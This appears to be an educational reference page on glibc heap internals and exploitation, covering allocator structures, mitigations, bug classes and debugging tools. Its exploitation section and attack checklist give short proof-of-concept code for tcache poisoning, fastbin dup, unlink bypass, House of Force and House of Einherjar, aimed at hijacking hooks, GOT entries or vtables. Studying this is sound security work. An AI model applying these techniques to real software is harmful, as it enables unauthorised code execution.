
Heap Internals & Exploitation

Deep reference on glibc ptmalloc2: chunk layout, free bins, tcache, safe-linking, UAF, double-free, heap overflow, and modern exploitation techniques.

The heap is the primary arena for dynamic memory in C and C++ programs. Most exploitation techniques at the heap layer abuse the allocator's unconditional trust of its own metadata — a trust you can violate through out-of-bounds writes, use-after-free, or double-free bugs.

These notes focus on glibc ptmalloc2, the allocator on most Linux systems. Concepts carry over to jemalloc and tcmalloc with varying details.


Quick Reference

Chunk        Allocator unit: metadata header + user region
Bins         Free-list structures: tcache → fast → unsorted → small → large
Coalesce     Merging adjacent free chunks to fight fragmentation
UAF          Use-after-free: pointer used after the object was freed
Double Free  Freeing the same pointer twice → corrupted free list
Overflow     Writing past a chunk into the adjacent chunk's header
Unlink       Classic exploit: corrupt bin pointers → arbitrary write
Tcache       Per-thread cache in glibc ≥ 2.26; almost all small allocs hit this first

1. Chunk Anatomy


Every malloc call returns a pointer into the user region of a chunk. Directly before that pointer sits the chunk header managed — and trusted — by the allocator.

In-use chunk layout

  (end of previous chunk's user data)
  ┌─────────────────────────────────────┐
  │  prev_size   (8 B)                  │  ← reused as user data when prev is in-use
  │  size | flags (8 B)                 │  ← size of THIS chunk; 3 flags in low bits
  ├─────────────────────────────────────┤  ← malloc() returns pointer HERE ↓
  │                                     │
  │       user data  (size − 16 B)      │
  │                                     │
  └─────────────────────────────────────┘
  (next chunk's prev_size starts here)

Free chunk — additional fields

  ┌─────────────────────────────────────┐
  │  prev_size   (8 B)                  │
  │  size | flags (8 B)                 │
  ├─────────────────────────────────────┤
  │  fd            → next free chunk    │
  │  bk            → prev free chunk    │
  │  fd_nextsize   (large bin only)     │
  │  bk_nextsize   (large bin only)     │
  └─────────────────────────────────────┘

Size flags (low 3 bits of size)

P   bit 0   PREV_INUSE — previous (lower) chunk is allocated; skip backward coalesce
M   bit 1   IS_MMAPPED — chunk came from mmap(), not the heap arena; free() calls munmap()
A   bit 2   NON_MAIN_ARENA — chunk belongs to a secondary thread arena
Key insight
Because the size field sits immediately before user data, even a one-byte overflow (e.g., writing a null terminator past a string buffer) can flip the PREV_INUSE bit of the next chunk, tricking the allocator into a dangerous backward consolidation.
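A minimal sketch of that single-byte scenario, assuming a fresh 64-bit heap where the second allocation lands immediately after the first:

char *a = malloc(24);   /* chunk size 0x20; usable region is exactly 24 bytes    */
char *b = malloc(240);  /* typically placed directly after a on a fresh heap     */

a[24] = '\0';           /* one byte past a's buffer: hits the low byte of b's
                           size field, clearing its PREV_INUSE bit               */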

2. Free Bins

After free(p), glibc places the chunk into one of five bin structures — checked in order during the next malloc:

Tcache ≥ glibc 2.26
  • Per-thread, no lock
  • 64 bins for sizes 24–1032 B (16-B steps)
  • Max 7 entries per bin (count enforced)
  • Singly linked — only fd
  • Checked first on both alloc and free
Fastbins
  • Chunk sizes ≤ 128 B by default on 64-bit; tunable up to 160 B via mallopt(M_MXFAST)
  • 10 singly-linked LIFO bins
  • No coalescing (speed trade-off)
  • Consolidated only on malloc_consolidate()
Unsorted Bin
  • Single circular doubly-linked list
  • First stop for non-fast freed chunks
  • Chunks sorted into small/large on the next malloc scan
Small Bins
  • 62 bins, chunk sizes 32–1008 B (64-bit)
  • Doubly-linked FIFO (exact-size match)
  • Chunks coalesce with neighbours on free
Large Bins
  • 63 bins for chunk sizes ≥ 1024 B (64-bit)
  • Doubly linked + size-sorted (best-fit)
  • Extra fd_nextsize / bk_nextsize skip-list chains
Top (Wilderness)
  • Last resort — extend heap via sbrk / mmap
  • Always at the high end of the arena
  • No prior free chunk to coalesce backwards with

malloc lookup order

malloc(n):
  1. tcache[size_class]     → O(1) thread-local pop              (≥ 2.26)
  2. fastbin[size_class]    → O(1) if size ≤ fast threshold
  3. small bin[size_class]  → exact fit, doubly-linked pop
  4. unsorted bin           → linear scan; splits oversized chunks
  5. large bin              → best-fit in a size-sorted list
  6. top chunk              → carve from wilderness, or sbrk/mmap

3. Tcache Deep Dive (glibc ≥ 2.26)

Tcache is a per-thread, lock-free singly-linked cache that makes small allocations near-free in latency. Its initial design lacked almost all integrity checks — making it the dominant exploitation target for several years.

Internal structures

typedef struct tcache_entry {
    struct tcache_entry *next;                /* singly linked */
    struct tcache_perthread_struct *key;      /* 2.29+: double-free canary */
} tcache_entry;
 
typedef struct tcache_perthread_struct {
    uint16_t counts[TCACHE_MAX_BINS];         /* entries per bin (max 7) */
    tcache_entry *entries[TCACHE_MAX_BINS];   /* head of each bin */
} tcache_perthread_struct;

The tcache_perthread_struct itself lives at the very start of the heap, allocated by malloc during thread initialisation. Corrupting it gives complete control over all future small allocations.

put / get (simplified)

static void tcache_put(mchunkptr chunk, size_t tc_idx) {
    tcache_entry *e = chunk2mem(chunk);
    e->key  = tcache;                        /* 2.29+: tag for double-free check */
    e->next = PROTECT_PTR(&e->next,          /* 2.32+: safe-linking              */
                          tcache->entries[tc_idx]);
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
}
 
static void *tcache_get(size_t tc_idx) {
    tcache_entry *e = tcache->entries[tc_idx];
    tcache->entries[tc_idx] = REVEAL_PTR(e->next);
    --(tcache->counts[tc_idx]);
    e->key = NULL;
    return (void *)e;
}

Safe-linking (glibc ≥ 2.32)

The next pointer stored in tcache (and fastbin) entries is XOR-mangled with a secret derived from its own storage address:

#define PROTECT_PTR(pos, ptr) \
    ((__typeof (ptr))((((size_t)(pos)) >> 12) ^ ((size_t)(ptr))))
#define REVEAL_PTR(ptr)  PROTECT_PTR(&ptr, ptr)

The slot address pos is right-shifted 12 bits (drops the page-offset) then XOR-ed with the pointer value. Forging a valid mangled pointer requires knowing the heap address of the slot — which demands a prior heap leak.

Bypass strategy
Read the next field of a freed chunk through a dangling pointer or OOB read — this leaks a mangled pointer. XOR it with slot_addr >> 12 to recover the raw heap address, then compute the correct mangled value for your forged pointer.
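A small sketch of that recovery step (illustrative names: leaked is the mangled next value read through the dangling pointer, slot is the heap address it was stored at):

#include <stdint.h>

/* Inverse of PROTECT_PTR: recover a raw pointer from a leaked next field. */
uintptr_t demangle(uintptr_t slot, uintptr_t leaked) {
    return (slot >> 12) ^ leaked;
}

/* Special case: if the freed chunk was the only entry in its bin, next was NULL,
 * so the stored value is simply slot >> 12: a heap-address leak on its own.     */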

4. Allocator Mitigations

double-free key ≥ 2.29
tcache_entry.key is set to the tcache header pointer on free; if a chunk arriving at free already carries that key, glibc scans the bin and calls abort() on a genuine double free.
safe-linking ≥ 2.32
tcache and fastbin next pointers are XOR'd with a slot-derived secret. Forging a pointer requires a heap address leak.
count check
tcache->counts[i] is incremented on put and decremented on get; a bin is only filled while its count is below 7 and only consulted while its count is above zero.
chunk alignment check ≥ 2.32
Chunks taken from tcache must be 16-byte (MALLOC_ALIGNMENT) aligned; a misaligned entry aborts.
fastbin double-free
Checks that the top-of-bin chunk ≠ the chunk being freed. Catches the immediate duplicate but not an A→B→A pattern.
unlink checks ≥ 2.3.4
Verifies fd->bk == chunk and bk->fd == chunk before relinking. Classic write-what-where now aborts unless you control both pointers.

5. Bug Classes

Uninitialized use

Reading fields of a freshly malloc'd object before writing them. Heap memory is not zeroed by malloc.

typedef struct { int len; char *buf; } Msg;
Msg *m = malloc(sizeof *m);
printf("%d\n", m->len);   // UB: reading stale bytes from a prior allocation
Impact
When stale bytes happen to be attacker-controlled leftovers from a previous allocation, this becomes a type confusion / stale-data disclosure primitive. Use calloc or explicit memset when zero-initialization matters.
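The zero-initialised variant of the example above is a one-line change:

Msg *m = calloc(1, sizeof *m);   /* zeroed: m->len == 0, m->buf == NULL */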

Unchecked malloc return

char *p = malloc(n);
memcpy(p, src, n);    // segfault — or null-pointer write — if p == NULL

On modern Linux, mmap_min_addr prevents null-page mapping in userspace, so null-deref is typically a crash. In the kernel or embedded contexts it may be exploitable.
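The defensive pattern is simply to check before first use:

char *p = malloc(n);
if (p == NULL) {          /* allocation failed: handle it explicitly */
    perror("malloc");
    return -1;
}
memcpy(p, src, n);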

Use-after-free (UAF)


char *a = malloc(16);
free(a);
a[2] = 0x41;          // UAF write — 'a' is now on the tcache free list

Timeline:

t0  malloc(16) → 0xADDR          allocate
t1  use(0xADDR)
t2  free(0xADDR)                  chunk goes to tcache/fastbin
t3  malloc(16) → 0xADDR          SAME region returned to a second caller
t4  a[2] = 0x41                   clobbers the second caller's object

Stack variant — use-after-return:

char *bad(void) {
    char local[16];
    return local;    // pointer to a stack frame that no longer exists
}
Primitives UAF enables

Type confusion — free object of type A, reallocate as type B at the same address, use A's dangling pointer to reach B's fields (see the sketch after this list).
Pointer hijack — if the freed object contained a function pointer or vtable, overwrite it via the dangling pointer.
Metadata leak — freed chunk's fd/bk now hold heap (or libc) addresses; read them through the dangling pointer for a leak.
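A minimal sketch of the type-confusion primitive, assuming two illustrative structs that fall into the same tcache size class:

#include <stdlib.h>
#include <string.h>

typedef struct { void (*log)(const char *); char tag[8]; } Handler;   /* type A */
typedef struct { char name[16]; }                           Profile;  /* type B */

void demo(const char *attacker_input) {       /* assumed ≥ 16 bytes               */
    Handler *h = malloc(sizeof *h);           /* 16-byte object                    */
    free(h);                                  /* h is now dangling                 */

    Profile *p = malloc(sizeof *p);           /* same size class: reuses h's chunk */
    memcpy(p->name, attacker_input, 16);      /* attacker bytes overlap h->log     */

    h->log("hi");                             /* call through a hijacked pointer   */
}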

Double free


free(p);
if (error_condition)
    free(p);   // double free — corrupts tcache / fastbin list

In tcache before glibc 2.29 (no key check), this directly creates a cycle:

tcache bin (size class): p → p → p → …   (self-referential)

malloc(sz) → p          (pop first entry)
malloc(sz) → p          (same address again — two owners of one allocation)
Prevention
After freeing, always set the pointer to NULL; free(NULL) is defined as a no-op. Adopt clear ownership semantics so exactly one code path frees each allocation.
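One defensive idiom is to clear the pointer in the same statement that frees it:

#define FREE_AND_NULL(p) do { free(p); (p) = NULL; } while (0)

FREE_AND_NULL(p);
if (error_condition)
    FREE_AND_NULL(p);    /* frees NULL: a defined no-op */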

Memory leak

for (int i = 0; i < N; i++) {
    char *buf = malloc(1 << 20);   // 1 MiB
    process(buf);
    /* forgot: free(buf) */
}
// RSS grows unbounded; heap becomes fragmented

Leaks rarely cause direct exploitability but degrade availability (OOM) and may let an attacker indirectly shape heap layout for later exploitation.

Heap overflow

Heap overflow case 1

Non-exploitable layout — overflow lands in the top chunk:

char *buf = malloc(1024);
strcpy(buf, argv[1]);   // overflow goes into wilderness; no free-list corruption

Heap overflow case 2

Exploitable layout — two adjacent allocations:

char *buf  = malloc(1024);
char *buf2 = malloc(1024);   // typically placed immediately after buf
strcpy(buf, argv[1]);        // overflow lands on buf2's chunk header
free(buf2);                  // allocator consults the corrupted header

What even a single-byte overflow can achieve:

  • Flip PREV_INUSE → trigger false backward consolidation
  • Overwrite size → misalign future allocations
  • Plant fake fd/bk → write-what-where on unlink (older glibc)

6. Exploitation Techniques

Classic Unlink

Precondition: Heap overflow into a free chunk's fd/bk fields.

Forge Y.fd = WRITEVAL            (the value planted; must itself point to writable memory)
Forge Y.bk = TARGET − 0x10       (so bk→fd lands on TARGET)

unlink(Y):
  fd→bk = bk    →  *(WRITEVAL + 0x18) = TARGET − 0x10
  bk→fd = fd    →  *(TARGET)          = WRITEVAL       ← arbitrary write

A write-what-where primitive. Patched in glibc 2.3.4 with the consistency check fd→bk == chunk && bk→fd == chunk.

Bypass (still works)
If you control a global/stack pointer P that holds the address of the fake chunk, set fd = P − 0x18, bk = P − 0x10. Then fd→bk and bk→fd both resolve to the fake chunk, passing the check.
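A sketch of that setup with 64-bit offsets (layout and names are hypothetical; chunk_list[0] plays the role of P and holds the address of the fake chunk):

void *chunk_list[4];                    /* global slot that stores our chunk pointer */

void forge(char *fake_chunk) {          /* precondition: chunk_list[0] == fake_chunk */
    *(void **)(fake_chunk + 0x10) = (char *)&chunk_list[0] - 0x18;   /* fd */
    *(void **)(fake_chunk + 0x18) = (char *)&chunk_list[0] - 0x10;   /* bk */
    /* fd->bk and bk->fd both dereference to chunk_list[0] == fake_chunk, so the
     * consistency check passes.  After unlink, chunk_list[0] points 0x18 bytes
     * before itself; writes through it now reach chunk_list, i.e. arbitrary write. */
}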

Fastbin Corruption

Precondition: UAF or double-free on a fastbin-sized chunk.

Step 1   free(A)          → fastbin: [ A ]
Step 2   free(B)          → fastbin: [ B → A ]
Step 3   free(A) again    → fastbin: [ A → B → A ]   (old glibc: top-of-bin is B ≠ A, check passes)
Step 4   malloc(sz)       → returns A; write A.fd = FAKE   (FAKE needs a size field matching this bin)
Step 5   malloc(sz)       → returns B
Step 6   malloc(sz)       → returns A again (drain)
Step 7   malloc(sz)       → returns FAKE + 0x10   (allocator treats FAKE as a valid chunk)

Use step 7 to write into FAKE — typically __malloc_hook, __free_hook, or a GOT entry.
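A compressed sketch of that sequence, assuming a glibc old enough to lack tcache (or a tcache bin already filled to 7) and a fake chunk we control so the size check passes:

#include <stdlib.h>
#include <stdint.h>

static size_t fake[8] __attribute__((aligned(16)));   /* our fake chunk header + body */

int main(void) {
    fake[1] = 0x40;               /* size field matching the 0x40 fastbin            */

    void *a = malloc(0x38);       /* 0x40-byte chunks                                */
    void *b = malloc(0x38);
    free(a);
    free(b);
    free(a);                      /* A → B → A: top of bin is B ≠ A, check passes    */

    void *x = malloc(0x38);       /* returns A                                       */
    *(size_t *)x = (size_t)fake;  /* A.fd now points at our fake chunk header        */
    malloc(0x38);                 /* returns B                                       */
    malloc(0x38);                 /* returns A again                                 */
    void *win = malloc(0x38);     /* returns fake + 0x10                             */
    (void)win;
    return 0;
}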

Tcache Dup / Poisoning

Before glibc 2.29 (no key check) the naïve double free below works directly; before 2.32 there is also no safe-linking, so next holds a raw pointer:

free(A)              → tcache: [ A ]
free(A)              → tcache: [ A → A ]
malloc(sz) → A       write A->next = &TARGET
malloc(sz) → A       (drain the duplicate)
malloc(sz) → TARGET  allocator hands us the target address as "fresh" memory

With safe-linking (≥ 2.32), step 3 requires a mangled pointer:

size_t slot = (size_t)&A->next;
A->next = (tcache_entry *)((slot >> 12) ^ (size_t)&TARGET);

This requires knowing &A->next, which in turn demands a prior heap address leak.
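Putting the pieces together, a minimal poisoning sketch against glibc ≥ 2.32, assuming a UAF write over chunk A (the heap leak is implicit here because the program itself knows A's address):

#include <stdint.h>
#include <stdlib.h>

_Alignas(16) static long target[4];     /* must be 16-byte aligned (glibc checks) */

int main(void) {
    void *a = malloc(0x28);
    void *b = malloc(0x28);
    free(b);
    free(a);                            /* tcache bin: a → b                      */

    /* UAF write: A's next field sits at offset 0 of the user region.             */
    uintptr_t slot = (uintptr_t)a;
    *(uintptr_t *)a = (slot >> 12) ^ (uintptr_t)target;   /* mangled &target      */

    malloc(0x28);                       /* returns a                              */
    long *evil = malloc(0x28);          /* returns target                         */
    evil[0] = 0x4141414141414141;       /* write into the "target"                */
    return 0;
}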

House of Force (pre-glibc 2.29)

Precondition: Overflow into the top chunk's size field.

1.  Overwrite top->size = 0xffffffffffffffff
2.  malloc(req) where req wraps 64-bit arithmetic to place the new
    top pointer at TARGET − 2*sizeof(size_t)
3.  The following malloc(any) returns TARGET — arbitrary allocation

Mitigated in glibc 2.29: top chunk size is sanity-checked against arena bounds.
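For concreteness, the size arithmetic in step 2 looks roughly like this on a pre-2.29 glibc (placeholder addresses; request2size rounding may need a small adjustment in practice):

size_t top_addr = 0x0;                  /* leaked address of the top chunk header   */
size_t target   = 0x0;                  /* address we want malloc to return         */

size_t nb  = target - 0x10 - top_addr;  /* distance the top pointer must travel     */
size_t req = nb - 0x8;                  /* undo the +8 header added by request2size */

malloc(req);                            /* top chunk now sits at target - 0x10      */
void *win = malloc(0x18);               /* returned pointer ≈ target                */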

House of Einherjar

Precondition: Off-by-one null-byte overflow into the low byte of the next chunk's size (clearing PREV_INUSE) and the ability to forge a fake free chunk somewhere in memory.

1.  Plant fake chunk header at address FAKE
2.  Off-by-one: clear PREV_INUSE of next chunk; set its prev_size = distance to FAKE
3.  free(next chunk)  →  backward consolidate lands at FAKE
4.  malloc(N)         →  returns chunk overlapping FAKE + live adjacent object
    (overlap gives read/write over the adjacent object)

Heap Spray

Allocate many same-size objects to deterministically fill bins and predict heap layout:

void *spray[256];
for (int i = 0; i < 256; i++)
    spray[i] = malloc(sz);          // allocate: lay out adjacent same-size chunks
for (int i = 0; i < 256; i++)
    free(spray[i]);                 // free: fill tcache + fastbins; later allocs return known addresses

Turns a probabilistic exploit into a reliable one. Essential when ASLR is active.


7. Tooling

Valgrind / memcheck
UAF, double-free, uninitialized reads, leaks — all with full stack traces. ~20–30× slowdown.
valgrind --leak-check=full ./bin
AddressSanitizer (ASan)
~2× slowdown. Catches overflows, UAF, double-free via red-zone shadow memory. Best for fuzzing.
-fsanitize=address,undefined -g
pwndbg
GDB plugin with heap-aware commands for live inspection of arenas, bins, chunks.
heap / bins / vis_heap_chunks
malloc_stats / mallinfo2
Runtime arena statistics from within the process. Useful for spotting leaks in long-running services.
malloc_stats(); /* writes to stderr */
libdislocator
AFL allocator that places each allocation at a page boundary — any overflow immediately segfaults.
LD_PRELOAD=libdislocator.so ./bin
heapinfo (pwndbg)
Dumps all bin counts, tcache contents, and arena state in a single command.
pwndbg> heapinfo

Essential pwndbg commands

heap                     walk all chunks in the main arena
bins                     show fastbins, unsorted, small, large bins
tcachebins               dump per-thread tcache entries + counts
vis_heap_chunks N        color-coded visual map of N chunks
find_fake_fast ADDR      find memory that looks like a valid fastbin chunk
malloc_chunk ADDR        parse chunk header at ADDR
try_free ADDR            simulate a free() call to check what glibc would do

Attack Checklist

  1. Identify the primitive — overflow / UAF / double-free / type confusion
  2. Leak addresses — read a freed chunk's fd/bk (unsorted bin → libc leak) or a tcache pointer (heap leak)
  3. Shape the heap — spray/drain to control chunk adjacency and bin state
  4. Corrupt a free-list pointer — redirect the next allocation to a target region (GOT, hook, vtable)
  5. Write your payload — overwrite __free_hook, __malloc_hook, a GOT entry, or a C++ vtable pointer
  6. Trigger — call the overwritten hook/function to gain control flow